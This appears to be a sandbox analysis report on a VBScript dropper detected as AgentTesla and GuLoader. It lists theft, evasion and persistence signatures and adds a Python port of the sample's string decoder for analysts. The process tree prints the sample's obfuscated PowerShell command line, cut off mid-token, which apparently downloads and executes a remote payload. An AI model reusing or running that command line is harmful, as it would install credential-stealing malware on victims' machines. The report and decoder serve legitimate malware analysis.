Windows
Analysis Report
TRANSPORT_INSTRUCTION_MR.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 4296 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSPORT_INSTRUCTION_MR.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- WmiPrvSE.exe (PID: 2228 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- powershell.exe (PID: 3596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'O utraMIndow oAigrezBes toiSkspolM usikl ,uts a Brne/Gr. nd5.itin.A fdel0Up,ai Zw ng(Syn apWNjereiC oresnD,ags dTosdeoHer rgwkroe sb il,e .rune NStrafTPra ec Forma1M yoli0The,m . Bort0Opf i,;Enkel A rch,WIrrad iObsern Ky st6.odra4B anju; eval For axUdb an6Czare4S pat ;under TayerrUnd ,iv tred:M .ckb1Jacqu 2Maime1 Se ri.Deesk0A llop) Brad BeregGHem odeSalewc DiskkRandm oVolit/ Qu z2 Kruk0F o.nu1Ordfo 0 enio0,an lo1jetst0I nvas1Gaska Knif.FS c riiRgerirG illyeStrid f Toitovex dex.nnek/G ener1Orke. 2minst1Bo. it. ,eha0D ia,o ';$Feline=Shockhead 'Stri pUOverts P oliegalehr Osobe-Fora aASkinkgOm giveEnwinn Sanc tJinr i ';$ostler=Shockhead 'goo,whK vikkt Niko t ousp uds tsNemme:Ha dw/Tjles/ GorvadAnti prChivei S ie.vKontre Dansk.Fell ygPrivaoP eezoViolig B,dflAmpe leO var.Is ospcSubtro MowbumJack e/Tilbau V ictcOpsge? RibboeTurp .xI,prgpTe levoHofchr havait pak k= Nurtdbe arloTrevew PutnanFu,i ll.resuoex tena Spird Se vi& Sun diHistodMa nja= Allo1 FrugthEnch eJ estyNym phvNucl ga ppasAA nin V U.pebPoa chPUgtetJJ ol,e7 .eww 5Lob.tW Ty phNEndomnA nalyYharme m AliqHadv env Al ypT urnuQGener DKropskNy. tiE.nobs9 WindK Beun TMon sfapo loZDisozPS nesksAfvae kInte ';$Olympier=Shockhead 'D et r>R dio ';$Tanquelinian=Shockhead 'Su ccei,nacke FascixCiv l ';$Aminobenzamide = Shockhead 'PreloeF orcec Fili hGuelpoNon e. B cki%B ,ahmainter pInserpBru nldUd rmaA nd.lt Karb aAquar% Br i.\ kattPB lodrrIndho e MonahNav ,ea,egists tr,irmocam e B lldAfs ky.Unc.vFD omsfiJav.l dRevi Oc. i&Stnne&Ch rys Skrine OvercHend ehMelleoDm ,ni Tritu$ sept ';sabotage (Shockhead 'B igba$Storh g R,tilTri m oUnadvb DissaSamm. lCr,nk: Ce coAForemaK i,kenUnfle dSportePsy chlToledyB ramsdTan e eNrga nSma afs Exce=r otte(T.skn cB dummval erdDelib D emat/Inaud cBiogr Fa el$WretcAn ormam Fors iEnneanmid nio ColebU nexteKlone n undsz Sk umaBevilmT vrf i Dest dFlexueB,l im)Adnot ');sabotage (Shockhead 'Form.$W ienegPal.n lAlleyobal lobEnedia BlgelStyre :ExpouUSch oon,mbets EngahLydli u Hel.nK.t ukn.kraleU n.erdAlcoh =Overf$,iu rooNaticsK ,loltDimpl l S,mieDan n rforgl.O plgns omin p Dubblafg rsiGangat alsr(U orb $musheOGl. cilOrdney nordmTeori p iploi,ym pae HeltrB eta )Fresn ');$ostler=$Unshunned[0];sabo
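The Shockhead function in the PowerShell command line above is the sample's string decoder: every literal is a run of 6-character groups, and the loop takes Substring(i, 1) for i = 5, 11, 17, ... while i is below Length-1, so the last character of each group is the payload and the final group is a throwaway. Each sabotage(Shockhead '...') call then runs a decoded string through the call operator (&). The Python below is an added example written for this page, not code from the report or the sample. It ports the decoder faithfully, adds a constructed encoder so the sample literals can be generated offline, and pulls Shockhead '...' literals out of a command line with a regex that assumes the single-quoted form seen above; the plaintexts in SAMPLE_CMDLINE (a user agent, "User-Agent", "iex") are made up for the demonstration and are not claims about what this sample's literals decode to.

```python
import random
import re

STEP = 6     # $Ratihabumr += (6): one payload character per 6-character group
OFFSET = 5   # loop starts at index 5: the payload character closes each group
TRIM = 1     # $Riffelgange = 1: the loop runs while index < Length - 1


def shockhead(blob: str) -> str:
    """Port of the sample's decoder: Substring(i, 1) for i = 5, 11, 17, ... < len-1."""
    out = []
    i = OFFSET
    limit = len(blob) - TRIM
    while i < limit:
        out.append(blob[i])          # $Kaputt.Substring($i, 1)
        i += STEP
    return "".join(out)


def encode(plain: str, seed: int = 7) -> str:
    """Constructed encoder (assumption: filler characters are arbitrary).

    Five filler characters precede each payload character, and a final
    throwaway group is appended so the last payload character does not sit
    at index len-1, where the decoder's Length-1 bound would drop it.
    """
    rng = random.Random(seed)
    filler = "abcdefghijklmnopqrstuvwxyz,. "   # no quote characters
    groups = []
    for ch in plain:
        groups.append("".join(rng.choice(filler) for _ in range(OFFSET)) + ch)
    groups.append("".join(rng.choice(filler) for _ in range(OFFSET)) + " ")
    return "".join(groups)


LITERAL_RE = re.compile(r"Shockhead '([^']*)'")


def decode_literals(cmdline: str) -> list[str]:
    """Pull every Shockhead '...' literal out of a command line and decode it."""
    return [shockhead(m) for m in LITERAL_RE.findall(cmdline)]


def missing_trailer_drops_last_char(plain: str) -> bool:
    """Edge case: without the throwaway group the final payload character is lost."""
    encoded = encode(plain)
    truncated = encoded[:-STEP]      # strip the trailer group
    return shockhead(truncated) == plain[:-1]


# Constructed stand-in for the report's command line: same shape, made-up values.
SAMPLE_CMDLINE = (
    "$Greenheart=Shockhead '" + encode("Mozilla/5.0 (Windows NT 10.0)") + "';"
    "$Feline=Shockhead '" + encode("User-Agent") + "';"
    "$Tanquelinian=Shockhead '" + encode("iex") + "';"
)


if __name__ == "__main__":
    names = ("Greenheart", "Feline", "Tanquelinian")
    for name, value in zip(names, decode_literals(SAMPLE_CMDLINE)):
        print(f"${name} -> {value!r}")
```

When run against a real command line from a report, feed the full text of the powershell.exe cmdline cell to decode_literals; the literals must be taken from the raw report, since any extraction that rewraps the text at a fixed column inserts spaces that break the 6-character period and shift every decoded character.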